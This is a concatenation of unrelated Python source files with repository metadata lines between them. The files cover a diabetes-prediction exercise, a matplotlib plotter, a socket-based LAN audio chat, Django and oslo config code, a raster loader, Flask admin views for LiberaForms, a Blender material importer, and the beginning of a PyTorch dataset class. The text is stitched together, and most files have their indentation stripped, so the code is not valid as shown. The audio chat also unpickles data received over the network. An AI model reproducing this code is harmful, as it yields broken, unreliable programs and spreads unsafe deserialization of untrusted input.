# ndc_df["Dosage Form"]= (ndc_df["Dosage Form"].str.strip()).str.upper()
# ndc_df["generic_drug_name"]= ndc_df["Non-proprietary Name"]+"_"+ndc_df["Dosage Form"]
ndc_df["generic_drug_name"]= ndc_df["Non-proprietary Name"]
df_reduce_dimension = pd.merge(df, ndc_df, on=['ndc_code'], how='inner')
df_reduce_dimension['LABEL'] = 0
reduce_dim_df= df_reduce_dimension.drop(columns=['Proprietary Name', 'Non-proprietary Name', 'Dosage Form', 'Route Name', 'Company Name', 'Product Type'])
return reduce_dim_df
#Question 4
def select_first_encounter(df):
'''
df: pandas dataframe, dataframe with all encounters
return:
- first_encounter_df: pandas dataframe, dataframe with only the first encounter for a given patient
'''
first_encounter_df = df.sort_values('encounter_id').groupby('patient_nbr').first()
first_encounter_df = first_encounter_df.reset_index()
return first_encounter_df
#Question 6
def patient_dataset_splitter(df, key='patient_nbr'):
'''
df: pandas dataframe, input dataset that will be split
patient_key: string, column that is the patient id
return:
- train: pandas dataframe,
- validation: pandas dataframe,
- test: pandas dataframe,
'''
df = df.iloc[np.random.permutation(len(df))]
unique_values = df[key].unique()
total_values = len(unique_values)
train_size = round(total_values * (1 - 0.4 ))
train = df[df[key].isin(unique_values[:train_size])].reset_index(drop=True)
left_size = len(unique_values[train_size:])
validation_size = round(left_size*0.5)
validation = df[df[key].isin(unique_values[train_size:train_size+validation_size])].reset_index(drop=True)
test = df[df[key].isin(unique_values[validation_size+train_size:])].reset_index(drop=True)
return train, validation, test
#Question 7
def create_tf_categorical_feature_cols(categorical_col_list,
vocab_dir='./diabetes_vocab/'):
'''
categorical_col_list: list, categorical field list that will be transformed with TF feature column
vocab_dir: string, the path where the vocabulary text files are located
return:
output_tf_list: list of TF feature columns
'''
output_tf_list = []
for c in categorical_col_list:
vocab_file_path = os.path.join(vocab_dir, c + "_vocab.txt")
'''
Which TF function allows you to read from a text file and create a categorical feature
You can use a pattern like this below...
tf_categorical_feature_column = tf.feature_column.......
'''
tf_categorical_feature_column = tf.feature_column.categorical_column_with_vocabulary_file(
key=c, vocabulary_file = vocab_file_path, num_oov_buckets=1)
one_hot_origin_feature = tf.feature_column.indicator_column(tf_categorical_feature_column)
output_tf_list.append(one_hot_origin_feature)
return output_tf_list
#Question 8
def normalize_numeric_with_zscore(col, mean, std):
'''
This function can be used in conjunction with the tf feature column for normalization
'''
return (col - mean)/std
def create_tf_numeric_feature(col, MEAN, STD, default_value=0):
'''
col: string, input numerical column name
MEAN: the mean for the column in the training data
STD: the standard deviation for the column in the training data
default_value: the value that will be used for imputing the field
return:
tf_numeric_feature: tf feature column representation of the input field
'''
normalizer = functools.partial(normalize_numeric_with_zscore, mean=MEAN, std=STD)
tf_numeric_feature= tf.feature_column.numeric_column(
key=col, default_value = default_value, normalizer_fn=normalizer, dtype=tf.float64)
return tf_numeric_feature
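# Example usage (illustrative column name and statistics; compute MEAN/STD from the training split):
# tf_inpatient_col = create_tf_numeric_feature('number_inpatient', MEAN=0.18, STD=0.63)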
#Question 9
def get_mean_std_from_preds(diabetes_yhat):
'''
diabetes_yhat: TF Probability prediction object
'''
m = diabetes_yhat.mean()
s = diabetes_yhat.stddev()
return m, s
# Question 10
def get_student_binary_prediction(df, col):
'''
df: pandas dataframe prediction output dataframe
col: str, probability mean prediction field
return:
student_binary_prediction: pandas dataframe converting input to flattened numpy array and binary labels
def convert_to_binary(df, pred_field, actual_field):
df['score'] = df[pred_field].apply(lambda x: 1 if x>=25 else 0 )
df['label_value'] = df[actual_field].apply(lambda x: 1 if x>=25 else 0)
return df
binary_df = convert_to_binary(model_output_df, 'pred', 'actual_value')
binary_df.head()
'''
    # Minimal sketch (assumption): binarize the mean prediction at a fixed cutoff, mirroring the
    # convert_to_binary example in the docstring above; adjust the threshold to your use case.
    student_binary_prediction = df[col].apply(lambda x: 1 if x >= 25 else 0).values
    return student_binary_prediction
| 3.28125 | 3 |
core_tools/utility/plotting/plot_1D.py | peendebak/core_tools | 0 | 6936 | <gh_stars>0
import matplotlib.pyplot as plt
import matplotlib as mpl
import numpy as np
import copy
from core_tools.utility.plotting.plot_settings import plot_layout, graph_settings_1D, _1D_raw_plot_data
from core_tools.utility.plotting.plot_general import _data_plotter
class plotter_1D(_data_plotter):
def __init__(self, plt_layout = plot_layout(), graph_setings = graph_settings_1D()):
self.plot_layout = plt_layout
self.local_data = np.empty([plt_layout.n_plots_y, plt_layout.n_plots_x], dtype = _1D_plot_single)
for i in range(self.local_data.size):
self.local_data.flat[i] = _1D_plot_single(graph_setings)
class _1D_plot_single:
def __init__(self, graph_settings):
self.settings = copy.copy(graph_settings) #default settings
self.data = []
self.x_lim = None
self.y_lim = None
def set_labels(self, xlabel, ylabel):
self.settings.xlabel = xlabel
self.settings.ylabel = ylabel
def set_range(self, x_range=None, y_range=None):
if x_range is not None:
self.x_lim = x_range
if y_range is not None:
self.y_lim = y_range
def add_data(self, x, y, xerr = None, yerr = None, label = None, settings = None, w=None, c=None, alpha=None):
if settings == None:
settings = copy.copy(self.settings)
else:
settings = copy.copy(settings)
if label is not None:
settings.label = label
if w is not None:
if 'l' not in w:
settings.linestyle = ''
if 'p' in w:
settings.marker = 'o'
if c is not None:
settings.color = c
if alpha is not None:
settings.alpha = alpha
self.data += [_1D_raw_plot_data(x,y, xerr, yerr, settings)]
def _render(self, ax, layout_settings, index, scaler = 1, figure=None):
ax.locator_params(axis='x', nbins=layout_settings.xbins)
ax.locator_params(axis='y', nbins=layout_settings.ybins)
ax.xaxis.set_minor_locator(mpl.ticker.AutoMinorLocator())
ax.yaxis.set_minor_locator(mpl.ticker.AutoMinorLocator())
ax.tick_params(direction='in', which='both', top=True, right=True)
if self.settings.xlog == True:
ax.set_xscale('log')
if self.settings.ylog == True:
ax.set_yscale('log')
if self.x_lim is not None:
ax.set_xlim(*self.x_lim)
if self.y_lim is not None:
ax.set_ylim(*self.y_lim)
labels = False
for i in range(len(self.data)):
data = self.data[i]
            if data.x_error is None and data.y_error is None:
ax.plot(data.x_data, data.y_data, **data.settings.plot_settings_to_dict(i, scaler))
else:
pass
# ax.errorbar(a, c, yerr = b/10,ecolor='g',linewidth=1.2,elinewidth=0.7)
if data.settings.label is not None:
labels = True
if self.settings.xlabel is not None:
if layout_settings.share_x == False:
ax.set_xlabel(self.settings.xlabel)
elif index[0] == layout_settings.n_plots_x-1 :
ax.set_xlabel(self.settings.xlabel)
if self.settings.ylabel is not None:
if layout_settings.share_y == False:
ax.set_ylabel(self.settings.ylabel)
elif index[1] == 0 :
ax.set_ylabel(self.settings.ylabel)
if labels == True:
ax.legend()
# TODO add log scale support !!!
if __name__ == '__main__':
from colors import MATERIAL_COLOR, Red
# global settings
g = graph_settings_1D()
g.color = Red[::-1]
g.linewidth = 1
a = plotter_1D(graph_setings=g)
a[0].set_labels('x_label', 'y_label')
a[0].add_data(np.linspace(0,50,200), np.sin(np.linspace(10,50,200)), w = 'p', alpha = 1, c=Red[5])
a[0].add_data(np.linspace(0,50,200), np.sin(np.linspace(10,50,200)), w = 'l', alpha = 0.3, c=Red[5])
# a.plot()
a.save('test1D_single.svg')
a = plotter_1D(plot_layout(n_plots_x = 1,n_plots_y = 2))
a[0].set_labels('x_label', 'y_label')
a[0].add_data(np.linspace(10,50,50), np.random.random([50]))
a[0,1].set_labels('x_label', 'y_label')
a[0,1].add_data(np.linspace(10,50,50), np.random.random([50]))
a.save('test1D_12.svg')
# a.plot()
a = plotter_1D(plot_layout(n_plots_x = 2,n_plots_y = 2, share_x=True, share_y=True))
a[0].set_labels('x_label', 'y_label')
a[0].add_data(np.linspace(10,50,50), np.random.random([50]), label='test 1')
a[0,1].set_labels('x_label', 'y_label')
a[0,1].add_data(np.linspace(10,50,50), np.random.random([50]), label='test 2')
a[0,1].add_data(np.linspace(10,50,50), np.random.random([50]))
a[1,0].set_labels('x_label', 'y_label')
a[1,0].add_data(np.linspace(10,50,50), np.random.random([50]))
a[1,1].set_labels('x_label', 'y_label')
a[1,1].add_data(np.linspace(10,50,50), np.sin(np.linspace(10,50,50)))
a.save('test1D_22.svg')
# a.plot()
a = plotter_1D(plot_layout((300, 70), n_plots_x = 6,n_plots_y = 1, share_x=False, share_y=True))
a[0].set_labels('time (ns)', 'Spin up probably (%)')
a[0].add_data(np.linspace(0,500,50), np.sin(np.linspace(10,50,50)))
a[1].set_labels('time (ns)', 'Spin up probably (%)')
a[1].add_data(np.linspace(0,500,50), np.sin(np.linspace(10,50,50)))
a[2].set_labels('time (ns)', 'Spin up probably (%)')
a[2].add_data(np.linspace(0,500,50), np.sin(np.linspace(10,50,50)))
a[3].set_labels('time (ns)', 'Spin up probably (%)')
a[3].add_data(np.linspace(0,500,50), np.sin(np.linspace(10,50,50)))
a[4].set_labels('time (ns)', 'Spin up probably (%)')
a[4].add_data(np.linspace(0,500,50), np.sin(np.linspace(10,50,50)))
a[5].set_labels('time (ns)', 'Spin up probably (%)')
a[5].add_data(np.linspace(0,500,50), np.sin(np.linspace(10,50,50)))
print(a)
a.save('test1D_61.svg')
a.plot() | 2.21875 | 2 |
v0.3/achat.py | Forec/lan-ichat | 63 | 6937 | <gh_stars>10-100
# last edit date: 2016/11/2
# author: Forec
# LICENSE
# Copyright (c) 2015-2017, Forec <<EMAIL>>
# Permission to use, copy, modify, and/or distribute this code for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
from socket import *
import threading
import pyaudio
import wave
import sys
import zlib
import struct
import pickle
import time
import numpy as np
CHUNK = 1024
FORMAT = pyaudio.paInt16
CHANNELS = 2
RATE = 44100
RECORD_SECONDS = 0.5
class Audio_Server(threading.Thread):
def __init__(self, remoteIP, remotePort, remoteVersion) :
threading.Thread.__init__(self)
self.setDaemon(True)
self.ADDR = (remoteIP, remotePort)
if remoteVersion == 4:
self.sock = socket(AF_INET ,SOCK_STREAM)
else:
self.sock = socket(AF_INET6 ,SOCK_STREAM)
self.p = pyaudio.PyAudio()
self.stream = None
def __del__(self):
if self.sock is not None:
self.sock.close()
if self.stream is not None:
try:
self.stream.stop_stream()
self.stream.close()
except:
pass
if self.p is not None:
try:
self.p.terminate()
except:
pass
def run(self):
print ("AUDIO server starts...")
while True:
try:
self.sock.connect(self.ADDR)
break
except:
time.sleep(3)
continue
print ("audio server <-> remote server success connected...")
check = "F"
check = self.sock.recv(1)
if check.decode("utf-8") != "S":
return
data = "".encode("utf-8")
payload_size = struct.calcsize("L")
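        # Wire format (as produced by Audio_Client below): each message is a struct-packed "L"
        # length prefix followed by a pickled list of raw audio frames of CHUNK samples each.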
self.stream = self.p.open(format=FORMAT,
channels=CHANNELS,
rate=RATE,
output=True,
frames_per_buffer = CHUNK
)
while True:
while len(data) < payload_size:
data += self.sock.recv(81920)
packed_size = data[:payload_size]
data = data[payload_size:]
msg_size = struct.unpack("L", packed_size)[0]
while len(data) < msg_size:
data += self.sock.recv(81920)
frame_data = data[:msg_size]
data = data[msg_size:]
frames = pickle.loads(frame_data)
for frame in frames:
self.stream.write(frame, CHUNK)
class Audio_Client(threading.Thread):
def __init__(self ,serverIP, serverPort, serverVersion):
threading.Thread.__init__(self)
self.setDaemon(True)
self.ADDR = (serverIP, serverPort)
if serverVersion == 4:
self.sock = socket(AF_INET, SOCK_STREAM)
else:
self.sock = socket(AF_INET6, SOCK_STREAM)
self.p = pyaudio.PyAudio()
self.stream = None
def __del__(self) :
if self.sock is not None:
self.sock.close()
if self.stream is not None:
try:
self.stream.stop_stream()
self.stream.close()
except:
pass
if self.p is not None:
try:
self.p.terminate()
except:
pass
def run(self):
print ("AUDIO client starts...")
while True:
try:
self.sock.connect(self.ADDR)
break
except:
time.sleep(3)
continue
print ("audio client <-> remote server success connected...")
check = "F"
check = self.sock.recv(1)
if check.decode("utf-8") != "S":
return
print ("remote AUDIO client connected...")
self.stream = self.p.open(format=FORMAT,
channels=CHANNELS,
rate=RATE,
input=True,
frames_per_buffer=CHUNK)
while self.stream.is_active():
frames = []
for i in range(0, int(RATE / CHUNK * RECORD_SECONDS)):
data = self.stream.read(CHUNK)
frames.append(data)
senddata = pickle.dumps(frames)
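            # Prefix the pickled frame list with a struct-packed "L" length so the server can
            # re-frame the TCP stream; this must stay in sync with Audio_Server.run().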
try:
self.sock.sendall(struct.pack("L", len(senddata)) + senddata)
except:
break | 2.46875 | 2 |
gdb/util.py | dennereed/paleocore | 1 | 6938 | <filename>gdb/util.py
from gdb.models import *
| 1 | 1 |
iwg_blog/blog/views/__init__.py | razortheory/who-iwg-webapp | 0 | 6939 | <gh_stars>0
from .base import ArticleView, ArticlePreviewView, ArticleListView, SearchView, LandingView, \
CategoryView, TagView, SubscribeForUpdates, UnsubscribeFromUpdates
from .ajax import GetArticleSlugAjax, TagsAutocompleteAjax
from .errors import page_not_found, server_error
| 1.109375 | 1 |
io_import_rbsp/rbsp/rpak_materials.py | snake-biscuits/io_import_rbsp | 7 | 6940 | <reponame>snake-biscuits/io_import_rbsp
# by MrSteyk & Dogecore
# TODO: extraction instructions & testing
import json
import os.path
from typing import List
import bpy
loaded_materials = {}
MATERIAL_LOAD_PATH = "" # put your path here
# normal has special logic
MATERIAL_INPUT_LINKING = {
"color": "Base Color",
"rough": "Roughness",
"spec": "Specular",
"illumm": "Emission",
}
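# Keys above are the texture-type names expected in the material JSON; values are the Principled
# BSDF input sockets they feed. Normal maps are handled separately in load_materials() below,
# where they are routed through a Normal Map node instead of a direct link.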
def load_material_data_from_name(subpath):
full_path = MATERIAL_LOAD_PATH + subpath + ".json"
if not os.path.isfile(full_path):
return False
return json.load(open(full_path, "rb"))
def load_image_from_subpath(subpath):
full_path = MATERIAL_LOAD_PATH + subpath
if not os.path.isfile(full_path):
return False
return bpy.data.images.load(full_path)
def load_materials(bsp) -> List[bpy.types.Material]:
materials = []
for material_name in bsp.TEXTURE_DATA_STRING_DATA:
if material_name in loaded_materials:
materials.append(loaded_materials[material_name])
continue
mat_data = load_material_data_from_name(material_name)
material = bpy.data.materials.new("materials/" + material_name)
if not mat_data:
loaded_materials[material_name] = material
materials.append(material)
# raise ValueError(f"Material data for material {material_name} does not exist!")
continue
# print(material_name, mat_data)
material.use_nodes = True
bsdf = material.node_tree.nodes["Principled BSDF"]
# data link
for mat_data_entry in MATERIAL_INPUT_LINKING.keys():
texture_file = mat_data[mat_data_entry]
if texture_file == "":
print(f"Texture type {mat_data_entry} doesn't exist in {material_name}'s material data, skipping.")
continue
img = load_image_from_subpath(texture_file)
if not img:
raise ValueError(f"{material_name}'s texture {texture_file} ({mat_data_entry}) doesn't exist!")
tex = material.node_tree.nodes.new("ShaderNodeTexImage")
tex.image = img
material.node_tree.links.new(bsdf.inputs[MATERIAL_INPUT_LINKING[mat_data_entry]], tex.outputs["Color"])
if mat_data_entry == "color":
material.node_tree.links.new(bsdf.inputs["Alpha"], tex.outputs["Alpha"])
# normal link
if mat_data["normal"] != "":
texture_file = mat_data["normal"]
normalmap = material.node_tree.nodes.new("ShaderNodeNormalMap")
img = load_image_from_subpath(texture_file)
if not img:
raise ValueError(f"Texture {texture_file} for material {material_name} (normal) doesn't exist!")
tex = material.node_tree.nodes.new("ShaderNodeTexImage")
tex.image = img
material.node_tree.links.new(normalmap.inputs["Color"], tex.outputs["Color"])
material.node_tree.links.new(bsdf.inputs["Normal"], normalmap.outputs["Normal"])
loaded_materials[material_name] = material
materials.append(material)
return materials
| 2.28125 | 2 |
initcmds/models.py | alldevic/mtauksync | 0 | 6941 | <filename>initcmds/models.py
from django.db import models
TASK_STATUS = (
("c", "created"),
("p", "progress"),
("s", "success"),
("f", "failed")
)
class TaskModel(models.Model):
lastrunned = models.DateTimeField(
"lastrunned", auto_now=False, auto_now_add=False)
taskname = models.CharField("taskname", max_length=50)
status = models.CharField(max_length=1, choices=TASK_STATUS, default='c')
fail = models.TextField("fail", blank=True, null=True)
def __str__(self) -> str:
return f"{self.taskname} - {self.lastrunned}"
class Meta:
verbose_name = "запуск"
verbose_name_plural = "запуски"
| 2.484375 | 2 |
aardvark/conf/reaper_conf.py | ttsiouts/aardvark | 0 | 6942 | # Copyright (c) 2018 European Organization for Nuclear Research.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
reaper_group = cfg.OptGroup(
'reaper',
title='Aardvark Service Options',
help="Configuration options for Aardvark service")
reaper_opts = [
cfg.StrOpt('reaper_driver',
default='chance_driver',
help="""
The driver that the reaper will use
Possible choices:
* strict_driver: The purpose of the preemptibles existence is to eliminate the
idling resources. This driver gets all the possible offers
from the relevant hosts and tries to find the best matching
for the requested resources. The best matching offer is the
combination of preemptible servers that leave the least
possible resources unused.
* chance_driver: A valid host is selected randomly and in a number of
preconfigured retries, the driver tries to find the instances
that have to be culled in order to have the requested
resources available.
"""
),
cfg.IntOpt('alternatives',
default=1,
help="""
The number of alternative slots that the reaper will try to free up for
each requested slot.
"""
),
cfg.IntOpt('max_attempts',
default=5,
help="""
The maximum number of attempts that the reaper will make in order to free up
the resources requested for each slot before giving up.
"""
),
cfg.ListOpt('watched_aggregates',
default=[],
help="""
The list of aggregate names that the reaper will try to make space to
Each element of the list can be an aggregate or a combination of aggregates.
Combination of aggregates is a single string with a vertical-line-separated
aggregate names.
e.g. watched_aggregates={agg_name1},{agg_name2}|{agg_name3}',....
For each element in the list, a reaper thread will be spawned and the request
will be forwarded to the responsible worker.
If the provided list is empty, only one worker will be spawned, responsible for
the whole system.
"""
),
cfg.StrOpt('job_backend',
default='redis',
choices=('redis', 'zookeeper'),
help="""
The backend to use for distributed task management.
For this purpose the Reaper uses OpenStack Taskflow. The two supported
backends are redis and zookeeper.
"""
),
cfg.StrOpt('backend_host',
default='localhost',
help="""
Specifies the host where the job board backend can be found.
"""
),
]
def register_opts(conf):
conf.register_group(reaper_group)
conf.register_opts(reaper_opts, group=reaper_group)
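# Typical wiring (illustrative): the service calls register_opts(cfg.CONF) at startup and then
# reads values such as cfg.CONF.reaper.reaper_driver or cfg.CONF.reaper.watched_aggregates.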
| 2.234375 | 2 |
src/Data.py | jhlee93/WNet-cGAN-Keras | 7 | 6943 | <filename>src/Data.py
import glob
import numpy as np
import rasterio
class Data:
def __init__(self, path, random=False):
"""
input:
path: path to the folder with subfolders: DSM, PAN, LABEL
        random: bool, to load samples randomly or sequentially (sampling is controlled per call in get_data)
"""
self.DSM = sorted(glob.glob(path+"/DSM/*.tif"))
self.PAN = sorted(glob.glob(path+"/PAN/*.tif"))
self.LABEL = sorted(glob.glob(path+"/LABEL/*.tif"))
if len(self.DSM) != len(self.PAN) or len(self.LABEL) != len(self.PAN):
raise ValueError('DSM, PAN or LABEL do not match')
def get_data(self, start=0, num=10, as_arr=True, random=False):
"""
        function: load 'num' tiles of DSM, PAN and LABEL into lists
        output: numpy arrays (or lists) of the DSM, PAN and LABEL tiles
"""
DSM_out = []
PAN_out = []
LABEL_out = []
if random:
            idx = np.random.choice(list(range(len(self.DSM))), num, replace=False)
print('randomly loading {0} tiles from {1} tiles'.format(num, len(self.DSM)))
else:
idx = list(range(start, start+num))
print('loading {0} - {1} image tiles'.format(start, start+num-1))
for i in idx:
DSM_out.append(np.moveaxis(rasterio.open(self.DSM[i]).read(),0,2))
PAN_out.append(np.moveaxis(rasterio.open(self.PAN[i]).read(),0,2))
LABEL_out.append(np.moveaxis(rasterio.open(self.LABEL[i]).read(),0,2))
DSM_remove = [self.DSM[i] for i in idx]
PAN_remove = [self.PAN[i] for i in idx]
LABEL_remove = [self.LABEL[i] for i in idx]
for i in range(len(DSM_remove)):
self.DSM.remove(DSM_remove[i])
self.PAN.remove(PAN_remove[i])
self.LABEL.remove(LABEL_remove[i])
if as_arr:
return np.asarray(DSM_out), np.asarray(PAN_out), np.asarray(LABEL_out)
else:
return DSM_out, PAN_out, LABEL_out
def split_trn_vld_tst(self, vld_rate=0.2, tst_rate=0.0, random=True, seed=10):
np.random.seed(seed)
num = len(self.DSM)
vld_num = int(num*vld_rate)
tst_num = int(num*tst_rate)
print('split into {0} train, {1} validation, {2} test samples'.format(num-vld_num-tst_num, vld_num, tst_num))
idx = np.arange(num)
if random:
np.random.shuffle(idx)
DSM_tst, PAN_tst, LABEL_tst = [self.DSM[k] for k in idx[:tst_num]], [self.PAN[k] for k in idx[:tst_num]], [self.LABEL[k] for k in idx[:tst_num]]
DSM_vld, PAN_vld, LABEL_vld = [self.DSM[k] for k in idx[tst_num:tst_num+vld_num]], [self.PAN[k] for k in idx[tst_num:tst_num+vld_num]], [self.LABEL[k] for k in idx[tst_num:tst_num+vld_num]]
DSM_trn, PAN_trn, LABEL_trn = [self.DSM[k] for k in idx[tst_num+vld_num:]], [self.PAN[k] for k in idx[tst_num+vld_num:]], [self.LABEL[k] for k in idx[tst_num+vld_num:]]
return DSM_trn, PAN_trn, LABEL_trn, DSM_vld, PAN_vld, LABEL_vld, DSM_tst, PAN_tst, LABEL_tst
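# Example usage (illustrative path; expects DSM/, PAN/ and LABEL/ subfolders containing .tif tiles):
# data = Data('/path/to/dataset')
# dsm, pan, label = data.get_data(start=0, num=10)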
| 3.078125 | 3 |
count_files.py | xuannianc/keras-retinanet | 0 | 6944 | <filename>count_files.py
import csv
vat_filenames = set()
train_csv_filename = 'train_annotations.csv'
val_csv_filename = 'val_annotations.csv'
for csv_filename in [train_csv_filename, val_csv_filename]:
for line in csv.reader(open(csv_filename)):
vat_filename = line[0].split('/')[-1]
vat_filenames.add(vat_filename)
print(len(vat_filenames))
vat_filenames.clear()
| 2.703125 | 3 |
liberaforms/views/admin.py | ngi-nix/liberaforms | 3 | 6945 | """
This file is part of LiberaForms.
# SPDX-FileCopyrightText: 2020 LiberaForms.org
# SPDX-License-Identifier: AGPL-3.0-or-later
"""
import os, json
from flask import g, request, render_template, redirect
from flask import session, flash, Blueprint
from flask import send_file, after_this_request
from flask_babel import gettext as _
from liberaforms.models.user import User
from liberaforms.models.form import Form
from liberaforms.models.site import Site
from liberaforms.models.invite import Invite
from liberaforms.utils.wraps import *
from liberaforms.utils import utils
from liberaforms.utils.utils import make_url_for, JsonResponse
from liberaforms.utils.dispatcher import Dispatcher
from liberaforms.utils import wtf
from pprint import pprint
admin_bp = Blueprint('admin_bp', __name__,
template_folder='../templates/admin')
@admin_bp.route('/admin', methods=['GET'])
@admin_required
def site_admin():
return render_template('admin-panel.html',
user=g.current_user,
app_version=utils.get_app_version(),
site=g.site)
""" User management """
@admin_bp.route('/admin/users', methods=['GET'])
@admin_required
def list_users():
return render_template('list-users.html',
users=User.find_all(),
invites=Invite.find_all())
@admin_bp.route('/admin/users/<int:id>', methods=['GET'])
@admin_required
def inspect_user(id):
user=User.find(id=id)
if not user:
flash(_("User not found"), 'warning')
return redirect(make_url_for('admin_bp.list_users'))
return render_template('inspect-user.html', user=user)
@admin_bp.route('/admin/users/toggle-blocked/<int:id>', methods=['POST'])
@admin_required
def toggle_user_blocked(id):
user=User.find(id=id)
if not user:
        return JsonResponse(json.dumps({}))
if user.id == g.current_user.id:
# current_user cannot disable themself
blocked=user.blocked
else:
blocked=user.toggle_blocked()
return JsonResponse(json.dumps({'blocked':blocked}))
@admin_bp.route('/admin/users/toggle-admin/<int:id>', methods=['POST'])
@admin_required
def toggle_admin(id):
user=User.find(id=id)
if not user:
        return JsonResponse(json.dumps({}))
if user.username == g.current_user.username:
# current_user cannot remove their own admin permission
is_admin=True
else:
is_admin=user.toggle_admin()
return JsonResponse(json.dumps({'admin':is_admin}))
@admin_bp.route('/admin/users/toggle-uploads-enabled/<int:id>', methods=['POST'])
@admin_required
def toggle_uploads_enabled(id):
user=User.find(id=id)
if not user:
        return JsonResponse(json.dumps({}))
uploads_enabled=user.toggle_uploads_enabled()
return JsonResponse(json.dumps({'uploads_enabled':uploads_enabled}))
@admin_bp.route('/admin/users/delete/<int:id>', methods=['GET', 'POST'])
@admin_required
def delete_user(id):
user=User.find(id=id)
if not user:
flash(_("User not found"), 'warning')
return redirect(make_url_for('admin_bp.list_users'))
if request.method == 'POST' and 'username' in request.form:
if user.is_root_user():
flash(_("Cannot delete root user"), 'warning')
return redirect(make_url_for('admin_bp.inspect_user', id=user.id))
if user.id == g.current_user.id:
flash(_("Cannot delete yourself"), 'warning')
            return redirect(make_url_for('admin_bp.inspect_user',
                                         id=user.id))
if user.username == request.form['username']:
user.delete_user()
flash(_("Deleted user '%s'" % (user.username)), 'success')
return redirect(make_url_for('admin_bp.list_users'))
else:
flash(_("Username does not match"), 'warning')
return render_template('delete-user.html', user=user)
@admin_bp.route('/admin/users/csv', methods=['GET'])
@admin_required
def csv_users():
csv_file = g.site.write_users_csv()
@after_this_request
def remove_file(response):
os.remove(csv_file)
return response
return send_file(csv_file, mimetype="text/csv", as_attachment=True)
""" Form management """
@admin_bp.route('/admin/forms', methods=['GET'])
@admin_required
def list_forms():
return render_template('list-forms.html', forms=Form.find_all())
@admin_bp.route('/admin/forms/toggle-public/<int:id>', methods=['GET'])
@admin_required
def toggle_form_public_admin_prefs(id):
queriedForm = Form.find(id=id)
if not queriedForm:
flash(_("Can't find that form"), 'warning')
return redirect(make_url_for('form_bp.my_forms'))
queriedForm.toggle_admin_form_public()
return redirect(make_url_for('form_bp.inspect_form', form_id=id))
""" Invitations """
@admin_bp.route('/admin/invites', methods=['GET'])
@admin_required
def list_invites():
return render_template('list-invites.html', invites=Invite.find_all())
@admin_bp.route('/admin/invites/new', methods=['GET', 'POST'])
@admin_required
def new_invite():
wtform=wtf.NewInvite()
if wtform.validate_on_submit():
message=wtform.message.data
token = utils.create_token(Invite)
#pprint(token)
new_invite=Invite( email=wtform.email.data,
message=message,
token=token,
admin=wtform.admin.data)
new_invite.save()
status = Dispatcher().send_invitation(new_invite)
if status['email_sent'] == True:
flash_text = _("We have sent an invitation to %s" % new_invite.email)
flash(flash_text, 'success')
else:
flash(status['msg'], 'warning')
return redirect(make_url_for('admin_bp.list_invites'))
wtform.message.data=Invite.default_message()
return render_template('new-invite.html',
wtform=wtform,
total_invites=Invite.find_all().count())
@admin_bp.route('/admin/invites/delete/<int:id>', methods=['GET'])
@admin_required
def delete_invite(id):
invite=Invite.find(id=id)
if invite:
invite.delete()
# i18n: Invitation to <EMAIL> deleted OK
flash(_("Invitation to %s deleted OK" % invite.email), 'success')
else:
flash(_("Opps! We can't find that invitation"), 'error')
return redirect(make_url_for('admin_bp.list_invites'))
""" Personal Admin preferences """
@admin_bp.route('/admin/toggle-newuser-notification', methods=['POST'])
@admin_required
def toggle_newUser_notification():
return json.dumps({'notify': g.current_user.toggle_new_user_notification()})
@admin_bp.route('/admin/toggle-newform-notification', methods=['POST'])
@admin_required
def toggle_newForm_notification():
return json.dumps({'notify': g.current_user.toggle_new_form_notification()})
""" ROOT_USERS functions
"""
@admin_bp.route('/admin/forms/change-author/<int:form_id>', methods=['GET', 'POST'])
@rootuser_required
def change_author(form_id):
queriedForm = Form.find(id=form_id)
if not queriedForm:
flash(_("Can't find that form"), 'warning')
return redirect(make_url_for('user_bp.my_forms'))
if request.method == 'POST':
author = queriedForm.author
if not ('old_author_username' in request.form and \
request.form['old_author_username']==author.username):
flash(_("Current author incorrect"), 'warning')
return render_template('change-author.html', form=queriedForm)
if 'new_author_username' in request.form:
new_author=User.find(username=request.form['new_author_username'])
if new_author:
if new_author.enabled:
old_author=author
if queriedForm.change_author(new_author):
log_text = _("Changed author from %s to %s" % (
old_author.username,
new_author.username))
queriedForm.add_log(log_text)
flash(_("Changed author OK"), 'success')
return redirect(make_url_for('form_bp.inspect_form',
form_id=queriedForm.id))
else:
flash(_("Cannot use %s. The user is not enabled" % (
request.form['new_author_username']),
), 'warning')
else:
flash(_("Can't find username %s" % (
request.form['new_author_username'])
), 'warning')
return render_template('change-author.html', form=queriedForm)
| 2.28125 | 2 |
python/zephyr/datasets/score_dataset.py | r-pad/zephyr | 18 | 6946 | <filename>python/zephyr/datasets/score_dataset.py
import os, copy
import cv2
from functools import partial
import numpy as np
import torch
import torchvision
from torch.utils.data import Dataset
from zephyr.data_util import to_np, vectorize, img2uint8
from zephyr.utils import torch_norm_fast
from zephyr.utils.mask_edge import getRendEdgeScore
from zephyr.utils.edges import generate_distance_image
from zephyr.normals import compute_normals
from zephyr.utils.timer import TorchTimer
try:
from zephyr.datasets.bop_raw_dataset import BopRawDataset
except ImportError:
pass
from zephyr.datasets.prep_dataset import PrepDataset
IMPORTANCE_ORDER = [
28, 27, 32, 33, 36, 35, 29, 16, 26, 22, 13, 4, 26, 21, 22
]
class ScoreDataset(Dataset):
def __init__(self, datapoints, dataset_root, dataset_name, args, mode='train', timing = False):
self.args = args
self.datapoints = datapoints
self.dataset_root = dataset_root
self.dataset_name = dataset_name
self.mode = mode
self.return_full_data = False
self.feature_size = args.feature_size
